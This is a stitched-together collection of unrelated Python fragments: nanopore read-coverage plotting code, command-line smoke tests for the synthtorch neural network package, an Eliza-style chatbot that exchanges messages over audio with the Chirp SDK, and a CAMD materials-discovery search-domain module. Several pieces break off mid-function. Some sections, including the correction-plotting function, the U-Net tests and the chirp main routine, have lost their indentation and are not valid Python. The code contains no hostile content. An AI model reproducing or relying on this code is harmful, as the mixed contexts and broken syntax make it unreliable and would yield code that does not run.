        'Position':r.FloatVector(base_starts),
        'Base':r.StrVector(base_labels),
        'Region':r.StrVector(base_regions)})
def get_region_reads(
        plot_intervals, raw_read_coverage, num_bases,
        filter_no_cov=True):
    """Collect the reads overlapping each plotting interval.

    :param plot_intervals: iterable of (region_i, (chrm, int_start,
        strand, stat)) tuples; a strand of None pulls reads from both
        strands
    :param raw_read_coverage: dict mapping (chrm, strand) to lists of
        read records with start/end attributes
    :param num_bases: width of each interval
    :param filter_no_cov: when True, drop intervals with no coverage and
        return the filtered plot_intervals; when False, return per-region
        (is_empty, "chrm:start") flags instead
    :returns: (all_reg_data, plot_intervals) or
        (all_reg_data, no_cov_regions) depending on filter_no_cov
    """
    def overlapping_reads(chrm, strand, start, end):
        # partial overlaps count: they still contribute to coverage and
        # other statistics, so full coverage is not required
        strand_reads = raw_read_coverage.get((chrm, strand), [])
        return [r_data for r_data in strand_reads
                if r_data.start < end and r_data.end >= start + 1]

    all_reg_data = []
    for region_i, (chrm, int_start, strand, stat) in plot_intervals:
        int_end = int_start + num_bases
        if strand is None:
            # no strand specified: merge reads from both strands
            reg_reads = (overlapping_reads(chrm, '+', int_start, int_end) +
                         overlapping_reads(chrm, '-', int_start, int_end))
        else:
            reg_reads = overlapping_reads(chrm, strand, int_start, int_end)
        all_reg_data.append((region_i, int_start, chrm, reg_reads))

    no_cov_regions = [
        (len(reg_reads) == 0, chrm + ':' + str(start))
        for _, start, chrm, reg_reads in all_reg_data]
    if not filter_no_cov:
        return all_reg_data, no_cov_regions

    # filter out no coverage regions
    plot_intervals = [
        p_int for p_int, (is_empty, _) in zip(plot_intervals, no_cov_regions)
        if not is_empty]
    all_reg_data = [
        reg_data for reg_data in all_reg_data if len(reg_data[3]) > 0]
    if any(is_empty for is_empty, _ in no_cov_regions):
        sys.stderr.write(
            '**** WARNING **** No coverage in regions: ' +
            '; '.join([reg for is_empty, reg in no_cov_regions
                       if is_empty]) + '\n')
    return all_reg_data, plot_intervals
########################################
#### Base plotting linker functions ####
########################################
def plot_corrections(
plot_intervals, reg_width, num_reads,
corrected_group, basecall_subgroup, pdf_fn):
if VERBOSE: sys.stderr.write('Preparing plot data.\n')
OldSegDat, NewSegDat, SigDat, DiffDat = [], [], [], []
for read_fn, reg_type in plot_intervals:
try:
old_dat, new_dat, signal_dat, diff_dat \
= get_read_correction_data(
read_fn, reg_type, reg_width, corrected_group + '/' +
basecall_subgroup)
# some FAST5 files give an error:
# IOError: "Can't read data (Inflate() failed)"
# KeyError: No 'Raw' slot 'Unable to open object'
except (IOError, KeyError) as e:
continue
if old_dat is None:
# skip reads that don't have correction slots b/c they
# couldn't be corrected
continue
OldSegDat.append(old_dat)
NewSegDat.append(new_dat)
SigDat.append(signal_dat)
DiffDat.append(diff_dat)
if len(OldSegDat) >= num_reads:
break
if len(OldSegDat) == 0:
sys.stderr.write(
'ERROR: No reads were able to be processed. Check ' +
'--fast5-basedirs for FAST5 files and that ' +
'--corrected-group and --basecall-subgroup are correct ' +
'for the reads provided .\n')
sys.exit()
if VERBOSE and len(OldSegDat) < num_reads:
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
tests.test_exec
test the synthtorch command line interfaces for runtime errors
Author: <NAME> (<EMAIL>)
Created on: Sep 07, 2018
"""
import os
import unittest
import torch
torch.autograd.set_detect_anomaly(True)
from synthtorch.exec.nn_train import main as nn_train
from synthtorch.exec.nn_predict import main as nn_predict
from ._test_funcs import TestCLI
class TestNConv(TestCLI):
    """
    End-to-end CLI smoke tests for the `nconv` architecture.

    Every test builds an argument list for the training CLI, asserts
    that training exits with status 0, and then (in most cases) rewrites
    the output config file and asserts that prediction also exits with
    status 0.  The shared train/predict boilerplate lives in the two
    private helpers below; each test method keeps only its distinctive
    CLI flags.
    """

    def _train(self, args):
        """Run the training CLI with `args` and assert a zero exit status."""
        self.assertEqual(nn_train(args), 0)

    def _predict(self, **ocf_kwargs):
        """Rewrite the output config file (forwarding `ocf_kwargs` to
        _modify_ocf), run the prediction CLI on it, and assert a zero
        exit status."""
        self._modify_ocf(self.jsonfn, **ocf_kwargs)
        self.assertEqual(nn_predict([self.jsonfn]), 0)

    def test_nconv_nopatch_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_nopatch.mdl -na nconv -ne 1 -nl 2 -bs 2 -dm 3 '
                                  f'--plot-loss {self.out_dir}/loss.png -ocf {self.jsonfn} '
                                  f'-vsd {self.train_dir} -vtd {self.train_dir} -v').split()
        self._train(args)
        self._predict()

    def test_nconv_patch_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2').split()
        self._train(args)
        self._predict()

    def test_nconv_preload_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -pr').split()
        self._train(args)
        self._predict()

    def test_nconv_swish_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -ac swish').split()
        self._train(args)
        self._predict()

    def test_nconv_checkpoint_and_load_cli(self):
        # first run writes a checkpoint (-chk 1); second run resumes from it
        args = self.train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 2 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -chk 1').split()
        self._train(args)
        args = self.train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 2 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2').split()
        self._train(args)
        self._predict()

    def test_nconv_cyclic_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -lrs cyclic -v -opt sgdw').split()
        self._train(args)
        self._predict()

    def test_nconv_restarts_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -lrs cosinerestarts -tm 2 -rp 2 -v').split()
        self._train(args)
        self._predict()

    def test_nconv_amsgrad_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -v -opt amsgrad').split()
        self._train(args)
        self._predict()

    def test_nconv_nesterov_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -v -opt nsgd').split()
        self._train(args)
        self._predict()

    def test_nconv_nesterovw_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -v -opt nsgdw').split()
        self._train(args)
        self._predict()

    def test_nconv_sgdw_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -v -opt sgdw').split()
        self._train(args)
        self._predict()

    def test_nconv_weightdecay_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -v -wd 0.1').split()
        self._train(args)
        self._predict()

    def test_nconv_writecsv_cli(self):
        # training only; no prediction step for the CSV-logging path
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -v -csv {self.out_dir}/test.csv').split()
        self._train(args)

    def test_nconv_data_aug_2d_cli(self):
        train_args = f'-s {self.train_dir}/tif/ -t {self.train_dir}/tif/'.split()
        args = train_args + (f'-o {self.out_dir}/nconv_nopatch.mdl -na nconv -ne 1 -nl 2 -bs 2 '
                             f'--plot-loss {self.out_dir}/loss.png -ocf {self.jsonfn} -e tif '
                             f'-p 1 1 1 1 1 -r 10 -ts 0.5 -sc 0.1 -mean 1 -std 1 '
                             f'-hf -vf -g 0.1 -gn 0.2 -pwr 1 -tx -ty -blk 5 6 -th 0').split()
        self._train(args)
        self._predict()

    def test_nconv_data_aug_3d_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_nopatch.mdl -na nconv -ne 1 -nl 2 -bs 2 '
                                  f'--plot-loss {self.out_dir}/loss.png -ocf {self.jsonfn} -dm 3 '
                                  f'-vsd {self.train_dir} -vtd {self.train_dir} -p 0 0 1 1 1 '
                                  f'-g 0.01 -gn 0 -pwr 1 -tx -ty -blk 5 10 -mean 1 -std 1').split()
        self._train(args)
        self._predict()

    def test_nconv_clip_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
                                  f'-ocf {self.jsonfn} -bs 2 -c 0.25').split()
        self._train(args)
        self._predict()

    def test_nconv_whole_img_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -dm 3 '
                                  f'-ocf {self.jsonfn} -bs 1').split()
        self._train(args)
        self._predict()

    def test_nconv_2d_crop_cli(self):
        train_args = f'-s {self.train_dir}/tif/ -t {self.train_dir}/tif/'.split()
        args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e tif -ps 8 8 '
                             f'-ocf {self.jsonfn}').split()
        self._train(args)
        self._predict()

    def test_nconv_2d_var_cli(self):
        train_args = f'-s {self.train_dir}/tif/ -t {self.train_dir}/tif/'.split()
        args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e tif '
                             f'-ocf {self.jsonfn}').split()
        self._train(args)
        self._predict(calc_var=True)

    def test_nconv_png_cli(self):
        train_args = f'-s {self.train_dir}/png/ -t {self.train_dir}/png/'.split()
        args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e png '
                             f'-ocf {self.jsonfn} -p 1 1 0 0 0 ').split()
        self._train(args)
        self._predict(calc_var=True, png_out=True)

    def test_nconv_color_cli(self):
        train_args = f'-s {self.train_dir}/color/ -t {self.train_dir}/color/'.split()
        args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e png -co -dm 2 '
                             f'-ocf {self.jsonfn}').split()
        self._train(args)
        self._predict(color_out=True, bs=1)

    @unittest.skipIf("TRAVIS" in os.environ and os.environ["TRAVIS"] == "true", "Skipping this test on Travis CI.")
    def test_nconv_color_tb_cli(self):
        train_args = f'-s {self.train_dir}/color/ -t {self.train_dir}/color/'.split()
        args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e png -co -dm 2 '
                             f'-ocf {self.jsonfn} -tb').split()
        self._train(args)
        self._predict(color_out=True, bs=1)

    def test_nconv_tif_predict_cli(self):
        train_args = f'-s {self.train_dir}/tif/ -t {self.train_dir}/tif/'.split()
        args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e tif '
                             f'-ocf {self.jsonfn}').split()
        self._train(args)
        self._predict(calc_var=True, tif_out=True)

    def test_nconv_3d_var_cli(self):
        args = self.train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 1 -dm 3 '
                                  f'-ocf {self.jsonfn}').split()
        self._train(args)
        self._predict(calc_var=True)

    def test_nconv_multimodal_cli(self):
        train_args = f'-s {self.train_dir} {self.train_dir} -t {self.train_dir} {self.train_dir}'.split()
        args = train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
                             f'-ocf {self.jsonfn} -bs 2').split()
        self._train(args)
        self._predict(multi=2)

    def test_nconv_multimodal_tiff_cli(self):
        train_args = f'-s {self.train_dir}/tif/ {self.train_dir}/tif/ -t {self.train_dir}/tif/ {self.train_dir}/tif/'.split()
        args = train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
                             f'-ocf {self.jsonfn} -bs 2 -e tif -th 0').split()
        self._train(args)
        self._predict(multi=2)
class TestDenseNet(TestCLI):
    """Smoke-test the `densenet` architecture through the CLI."""

    def test_densenet_cli(self):
        src_tgt = f'-s {self.train_dir}/tif/ -t {self.train_dir}/tif/'.split()
        cli_args = src_tgt + (f'-o {self.out_dir}/densenet.mdl -na densenet -ne 1 -bs 2 -e tif '
                              f'-ocf {self.jsonfn}').split()
        # train, then rewrite the output config and predict; both CLIs
        # must exit with status 0
        self.assertEqual(nn_train(cli_args), 0)
        self._modify_ocf(self.jsonfn)
        self.assertEqual(nn_predict([self.jsonfn]), 0)
class TestUnet(TestCLI):
def test_unet_cli(self):
args = self.train_args + (f'-o {self.out_dir}/unet.mdl -na unet -ne 1 -nl 3 -cbp 1 -ps 16 16 16 -bs 2 -dm 3 '
f'-ocf {self.jsonfn}').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_unet_freeze_cli(self):
args = self.train_args + (f'-o {self.out_dir}/unet.mdl -na unet -ne 1 -nl 3 -cbp 1 -ps 16 16 16 -bs 2 -dm 3 '
f'-ocf {self.jsonfn} -fr').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_unet_ic_cli(self):
args = self.train_args + (f'-o {self.out_dir}/unet.mdl -na unet -ne 1 -nl 3 -cbp 1 -ps 16 16 16 -bs 2 -dm 3 '
f'-ocf {self.jsonfn} -ic').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval | |
<reponame>satoruisaka/chirptalk<gh_stars>0
"""
chirp_eliza.py - chirptalk between two devices with Eliza-like conversation exchange
<NAME>
December 27, 2019
A device sends a message via audio. Another device listens to the audio signal,
decodes the message, and sends a response message via audio.
The two devices continue to communicate with each other over sound.
Preparation:
Install python3 and pip3. Install mic and speaker.
Install Chirp SDK for data-over-sound function
Install NLTK for natural language chat function
Download the python code and run
Chirp SDK https://developers.chirp.io/
NLTK: Natural Language Toolkit https://www.nltk.org/
"""
# nltk components
from __future__ import print_function
import nltk
from nltk.chat.util import Chat, reflections
# chirpsdk components
import argparse
import sys
import time
from chirpsdk import ChirpSDK, CallbackSet, CHIRP_SDK_STATE
# chat data is a table of response pairs.
# Each pair consists of a regular expression matched against user input and
# a tuple of candidate responses.  The "!@#" token is a placeholder inside
# responses (presumably substituted with the captured group downstream --
# confirm against the sender/receiver logic).  Patterns are tried in order,
# so the catch-all r'(.*)' entry must stay last.
pairs = (
    (
        r'I need (.*)',
        (
            # NOTE(review): looks like a 32-character payload-size test
            # response -- confirm before removing
            "01234567890123456789012345678901",
            "Why do you need !@#?",
            "Would it really help you?",
            "Are you sure you need !@#?",
        ),
    ),
    (
        r'Why don\'t you (.*)',
        (
            "Do you think I don't !@#?",
            "Perhaps I will !@#.",
            "Do you want me to !@#?",
        ),
    ),
    (
        r'Why can\'t I (.*)',
        (
            "Do you think you can !@#?",
            "If you could, what would you do?",
            "I don't know, why can't you?",
            "Have you really tried?",
        ),
    ),
    (
        r'I can\'t (.*)',
        (
            "How do you know you can't !@#?",
            "Perhaps you could if you tried.",
            "What do you need to !@#?",
        ),
    ),
    (
        r'I am (.*)',
        (
            "Is that why you came to me?",
            "How long have you been !@#?",
            "How do you feel about that?",
        ),
    ),
    (
        r'I\'m (.*)',
        (
            # fixed typo: "beng" -> "being"
            "How does it feel being !@#?",
            "Do you enjoy being !@#?",
            "Why do you tell me you're !@#?",
            "Why do you think you're !@#?",
        ),
    ),
    (
        r'Are you (.*)',
        (
            "Why does it matter to you?",
            "Do you prefer if I'm not that?",
            "Perhaps you think I am !@#.",
            "I may be !@#, what do you think?",
        ),
    ),
    (
        r'What (.*)',
        (
            "Why do you ask?",
            "How would an answer help you?",
            "What do you think?",
        ),
    ),
    (
        r'How (.*)',
        (
            "How do you suppose?",
            "Perhaps you can answer yourself",
            "What is it you're really asking?",
        ),
    ),
    (
        r'Because (.*)',
        (
            "Is that the real reason?",
            "What other reasons come to mind?",
            "Does it apply to anything else?",
            "If so, what else must be true?",
        ),
    ),
    (
        r'(.*) sorry (.*)',
        (
            "No apology is needed.",
            "How do you feel about that?",
        ),
    ),
    (
        r'Hello(.*)',
        (
            # fixed grammar: "you drop by" -> "you dropped by"
            "Hello, I'm glad you dropped by",
            "Hi there... how are you today?",
            "How are you feeling today?",
        ),
    ),
    (
        r'I think (.*)',
        (
            "Do you doubt !@#?",
            "Do you really think so?",
            "But you're not sure !@#?",
        ),
    ),
    (
        r'(.*) friend (.*)',
        (
            "Tell me more about your friends",
            "What comes to mind?",
            "Why don't you tell me more?",
        ),
    ),
    (
        r'Yes',
        (
            "You seem quite sure.",
            "OK, but can you elaborate a bit?",
        ),
    ),
    (
        r'(.*) computer(.*)',
        (
            "Are you talking about me?",
            "Does it seem strange to you?",
            "How do computers make you feel?",
            "Do you feel threatened?",
        ),
    ),
    (
        r'Is it (.*)',
        (
            "Do you think it is?",
            "Perhaps, what do you think?",
            "If so, what would you do?",
            "It could be !@#.",
        ),
    ),
    (
        r'It is (.*)',
        (
            "You seem very certain.",
            "If not, how would you feel?",
        ),
    ),
    (
        r'Can you (.*)',
        (
            "What makes you think I can't?",
            "If I could !@#, so what?",
            "Why do you ask?",
        ),
    ),
    (
        r'Can I (.*)',
        (
            "!@#?",
            "Do you want to !@#?",
            "If you could, would you?",
        ),
    ),
    (
        r'You are (.*)',
        (
            "Why do you think I am !@#?",
            "Does it please you to think so?",
            "Perhaps you like me to be so",
            "Are you talking about yourself?",
        ),
    ),
    (
        r'You\'re (.*)',
        (
            "!@#?",
            "You are !@#?",
            "Are we talking about you, or me?",
        ),
    ),
    (
        r'I don\'t (.*)',
        ("Don't you really !@#?", "Why don't you !@#?", "Do you want to !@#?"),
    ),
    (
        r'I feel (.*)',
        (
            "Good, tell me more",
            "Do you often feel that?",
            "When do you usually feel it?",
            "When you feel it, what do you do",
        ),
    ),
    (
        r'I have (.*)',
        (
            "Why do you have !@#?",
            "what, !@#?",
            "What will you do next?",
        ),
    ),
    (
        r'I would (.*)',
        (
            "Could you explain why?",
            "Why would you?",
            "Who else knows that?",
        ),
    ),
    (
        r'Is there (.*)',
        (
            "what, !@#?",
            "It's likely",
            # fixed broken phrasing: "Would you like about it?"
            "Would you like to know about it?",
        ),
    ),
    (
        r'My (.*)',
        (
            "I see, !@#.",
            "Why !@#?",
            "How do you feel?",
        ),
    ),
    (
        r'You (.*)',
        (
            # fixed typo: "ou" -> "you"
            "Let's talk about you, not me.",
            "Why do you care?",
            "You are !@#?",
        ),
    ),
    (r'Why (.*)', ("Why don't you tell me why?", "Why do you think so?")),
    (
        r'I want (.*)',
        (
            "What would it mean to you?",
            "Why do you want it?",
            "What would you do if you had it?",
            "What, !@#?",
        ),
    ),
    (
        r'(.*) mother(.*)',
        (
            "Tell me more about your mother.",
            "How is your mom?",
            "How do you feel about your mom?",
            "How does it feel?",
            "Good family is important.",
        ),
    ),
    (
        r'(.*) father(.*)',
        (
            "Tell me more about your dad.",
            "How does your dad make you feel?",
            "How do you feel about your dad?",
            "Dad?",
            "Do you have trouble with dad?",
        ),
    ),
    (
        r'(.*) child(.*)',
        (
            "Did you have a child?",
            "What is your childhood memory?",
            "Do you remember any dreams?",
            "Did other children tease you?",
            "What do you think?",
        ),
    ),
    (
        r'(.*)\?',
        (
            "Why do you ask that?",
            "Please think.",
            "The answer lies within yourself?",
            "Why don't you tell me?",
        ),
    ),
    (
        r'quit',
        (
            "Thank you for talking with me.",
            "Good-bye.",
            "Thank you, Have a good day!",
        ),
    ),
    # catch-all fallback; must remain the final entry
    (
        r'(.*)',
        (
            "Please tell me more.",
            "Let's talk about your feelings.",
            "Can you elaborate on that?",
            "Why !@#?",
            "I see.",
            "Very interesting.",
            "!@#.",
            "I see. What does that tell you?",
            "How does that make you feel?",
            "How does it feel saying that?",
        ),
    ),
)
# create an eliza-like chat bot from the response table above, using
# nltk's standard pronoun reflections ("I" -> "you", etc.)
eliza_chatbot = Chat(pairs, reflections)
# chirptalk segment: module-level state shared with the SDK callbacks below
rdata = bytearray(32)  # fixed 32-byte buffer holding the last received payload
payloadlength = 0      # number of valid bytes currently in rdata
class Callbacks(CallbackSet):
    """Chirp SDK callback handlers.

    Only on_received does real work: it copies the decoded payload into
    the module-level rdata buffer and records its length in the
    payloadlength global.  The remaining callbacks are intentionally
    no-ops kept for SDK lifecycle visibility.
    """

    def on_state_changed(self, previous_state, current_state):
        """ Called when the SDK's state has changed """

    def on_sending(self, payload, channel):
        """ Called when a chirp has started to be transmitted """

    def on_sent(self, payload, channel):
        """ Called when the entire chirp has been sent """

    def on_receiving(self, channel):
        """ Called when a chirp frontdoor is detected """

    def on_received(self, payload, channel):
        """
        Called when an entire chirp has been received.
        Note: A payload of None indicates a failed decode.
        """
        global payloadlength
        if payload is None:
            print('Decode failed!')
        else:
            # record the payload length and copy its bytes into the shared
            # buffer (assumes payloads never exceed len(rdata) == 32 --
            # TODO confirm against the configured chirp protocol)
            payloadlength = len(payload)
            for idx, byte in enumerate(payload):
                rdata[idx] = byte
def main(block_name, input_device, output_device,
block_size, sample_rate, channel):
global payloadlength
# Initialise Chirp SDK
sdk = ChirpSDK(block=block_name)
print(str(sdk))
print('Protocol: {protocol} [v{version}]'.format(
protocol=sdk.protocol_name,
version=sdk.protocol_version))
print(sdk.audio.query_devices())
# Configure audio
sdk.audio.input_device = input_device
sdk.audio.output_device = output_device
sdk.audio.block_size = block_size
sdk.input_sample_rate = sample_rate
sdk.output_sample_rate = sample_rate
# Set callback functions
sdk.set_callbacks(Callbacks())
# Set transmission channel for multichannel protocols
if args.channel is not None:
if args.channel >= sdk.channel_count:
raise ValueError('Channel %d is not available' % args.channel)
# print('Writing to channel %d' % args.channel)
sdk.transmission_channel = args.channel
# Send a message
# [we don't do random payload in this code] Generate random payload and send
# payload = sdk.random_payload()
# start from the user-supplied message in main args
message = args.message.encode('utf-8')
payload = sdk.new_payload(message)
sdk.start(send=True, receive=True)
sdk.send(payload)
tom0 = 0
waittime = 0
try:
# Process audio streams
| |
<reponame>JosephMontoya-TRI/CAMD<filename>camd/domain.py<gh_stars>0
# Copyright Toyota Research Institute 2019
"""
Preliminary module for determining search spaces
"""
import pandas as pd
import abc
import warnings
import itertools
import numpy as np
from protosearch.build_bulk.oqmd_interface import OqmdInterface
from pymatgen.io.ase import AseAtomsAdaptor
from pymatgen import Composition, Element
from matminer.featurizers.base import MultipleFeaturizer
from matminer.featurizers.composition import (
ElementProperty,
Stoichiometry,
ValenceOrbital,
IonProperty,
)
from matminer.featurizers.structure import (
SiteStatsFingerprint,
StructuralHeterogeneity,
ChemicalOrdering,
StructureComposition,
MaximumPackingEfficiency,
)
class DomainBase(abc.ABC):
    """
    Abstract base for CAMD search domains.

    A domain couples candidate generation with featurization so the
    CAMD loop can consume a ready-made, ML-ready search space.
    """

    @abc.abstractmethod
    def candidates(self):
        """
        Primary method for every Domain to provide candidates.

        Returns:
            (pandas.DataFrame): features for generated hypothetical
                structures. The Index of dataframe should be the
                unique ids for the structures.
        """

    @property
    @abc.abstractmethod
    def bounds(self):
        """
        Returns:
            list: names of dimensions of the search space.
        """

    @abc.abstractmethod
    def sample(self, num_samples):
        """
        Abstract method for sampling from created domain

        Args:
            num_samples: number of candidates to sample

        Returns:
            sampled subset of the domain
        """

    @property
    def bounds_string(self):
        """
        Property representation of search space bounds

        Returns:
            (str): representation of search space bounds, e.g.
                "Ir-Fe-O" or "x1-x2-x3"
        """
        return "-".join(self.bounds)
class StructureDomain(DomainBase):
"""
Provides machine learning ready candidate domains (search spaces) for
hypothetical structures. If scanning an entire system, use the
StructureDomain.from_bounds method. If scanning for formula(s),
provide a list of formulas directly to StructureDomain.
Once the StructureDomain is initialized, the method candidates returns
a fully-featurized hypothetical materials set subject to n_max_atoms.
"""
def __init__(self, formulas, n_max_atoms=None):
"""
Args:
formulas ([str]): list of chemical formulas to create new
material candidates.
n_max_atoms (int): number of max atoms
"""
self.formulas = formulas
self.n_max_atoms = n_max_atoms
self.features = None
self._hypo_structures = None
@classmethod
def from_bounds(
cls,
bounds,
n_max_atoms=None,
charge_balanced=True,
create_subsystems=False,
**kwargs
):
"""
Convenience constructor that delivers an ML-ready domain
from defined chemical boundaries.
Args:
bounds ([str]): list of element strings corresponding to bounds of
the composition space, e. g. ['Fe', 'O', 'N']
n_max_atoms (int): maximum number of atoms in the generated
formulae
charge_balanced (bool): whether to filter generated formulae by
charge balancing the respective elements according to allowed
oxidation states
create_subsystems (bool): TODO - what is this?
**kwargs: arguments to pass to formula creator
"""
formulas = create_formulas(
bounds,
charge_balanced=charge_balanced,
create_subsystems=create_subsystems,
**kwargs
)
print("Generated chemical formulas: {}".format(formulas))
return cls(formulas, n_max_atoms)
@property
def bounds(self):
"""
Method to get bounds from StructureDomain
Returns:
([]): list of dimensions in search space
"""
bounds = set()
for formula in self.formulas:
bounds = bounds.union(Composition(formula).as_dict().keys())
return bounds
def get_structures(self):
"""
Method to call protosearch structure generation
"""
if self.formulas:
print("Generating hypothetical structures...")
self._hypo_structures = get_structures_from_protosearch(self.formulas)
print(
"Generated {} hypothetical structures".format(len(self.hypo_structures))
)
else:
raise ValueError("Need formulas to create structures")
@property
def hypo_structures(self):
"""
Returns (dataframe): Hypothetical structures generated by
protosearch, filtered by n_max_atoms
"""
if self._hypo_structures is None:
self.get_structures()
if self.n_max_atoms:
n_max_filter = [
i.num_sites <= self.n_max_atoms
for i in self._hypo_structures["structure"]
]
if self._hypo_structures is not None:
return self._hypo_structures[n_max_filter]
else:
return None
else:
return self._hypo_structures
@property
def hypo_structures_dict(self):
"""
Returns:
(dict): Hypothetical structures generated by
protosearch, filtered by n_max_atoms
"""
return self.hypo_structures["structure"].to_dict()
@property
def compositions(self):
"""
Returns:
(list): Compositions of hypothetical structures generated.
"""
if self.hypo_structures is not None:
return [s.composition for s in self.hypo_structures]
else:
warnings.warn("No stuctures available.")
return []
@property
def formulas_with_valid_structures(self):
"""
Quick method to filter formulas with valid structures
Returns:
([str]): list of formulas with corresponding valid
structures
"""
# Note the redundancy here is for pandas to work
if self.valid_structures is not None:
return [s.composition.formula for s in self.valid_structures["structure"]]
else:
warnings.warn("No structures available yet.")
return []
def featurize_structures(self, featurizer=None, **kwargs):
"""
Featurizes the hypothetical structures available from
hypo_structures method. Hypothetical structures for which
featurization fails are removed and valid structures are
made available as valid_structures
Args:
featurizer (Featurizer): A MatMiner Featurizer.
Defaults to MultipleFeaturizer with PRB Ward
Voronoi descriptors.
**kwargs (dict): kwargs passed to featurize_many
method of featurizer.
Returns:
(pandas.DataFrame): features
"""
# Note the redundancy here is for pandas to work
if self.hypo_structures is None:
warnings.warn("No structures available. Generating structures.")
self.get_structures()
print("Generating features")
featurizer = (
featurizer
if featurizer
else MultipleFeaturizer(
[
SiteStatsFingerprint.from_preset(
"CoordinationNumber_ward-prb-2017"
),
StructuralHeterogeneity(),
ChemicalOrdering(),
MaximumPackingEfficiency(),
SiteStatsFingerprint.from_preset(
"LocalPropertyDifference_ward-prb-2017"
),
StructureComposition(Stoichiometry()),
StructureComposition(ElementProperty.from_preset("magpie")),
StructureComposition(ValenceOrbital(props=["frac"])),
StructureComposition(IonProperty(fast=True)),
]
)
)
features = featurizer.featurize_many(
self.hypo_structures["structure"], ignore_errors=True, **kwargs
)
n_species, formula = [], []
for s in self.hypo_structures["structure"]:
n_species.append(len(s.composition.elements))
formula.append(s.composition.formula)
self._features_df = pd.DataFrame.from_records(
features, columns=featurizer.feature_labels()
)
self._features_df.index = self.hypo_structures.index
self._features_df["N_species"] = n_species
self._features_df["Composition"] = formula
self._features_df["structure"] = self.hypo_structures["structure"]
self.features = self._features_df.dropna(axis=0, how="any")
self.features = self.features.reindex(sorted(self.features.columns), axis=1)
self._valid_structure_labels = list(self.features.index)
self.valid_structures = self.hypo_structures.loc[self._valid_structure_labels]
print(
"{} out of {} structures were successfully featurized.".format(
self.features.shape[0], self._features_df.shape[0]
)
)
return self.features
def candidates(self, include_composition=True):
    """
    Recommended convenience method returning a fully-featurized
    set of hypothetical structures.

    Lazily triggers structure generation and featurization if either
    has not been run yet.

    Args:
        include_composition (bool): keep the "Composition" column
            in the returned dataframe.

    Returns:
        (pandas.DataFrame): feature vectors of valid
            hypothetical structures.
    """
    if self._hypo_structures is None:
        self.get_structures()
    if self.features is None:
        self.featurize_structures()
    if not include_composition:
        return self.features.drop("Composition", axis=1)
    return self.features
def sample(self, num_samples):
    """
    Method for sampling domain.

    Args:
        num_samples (int): number of samples to return

    Returns:
        (pd.DataFrame): dataframe corresponding to sampled
            domain with num_samples candidates
    """
    # Bug fix: the sampled frame was computed but never returned,
    # so this method always yielded None despite its docstring.
    return self.candidates().sample(num_samples)
def get_structures_from_protosearch(formulas, source="icsd", db_interface=None):
    """
    Calls protosearch to get the hypothetical structures.

    Args:
        formulas ([str]): list of chemical formulas from which
            to generate candidate structures
        source (str): project name in OQMD to be used as source.
            Defaults to ICSD.
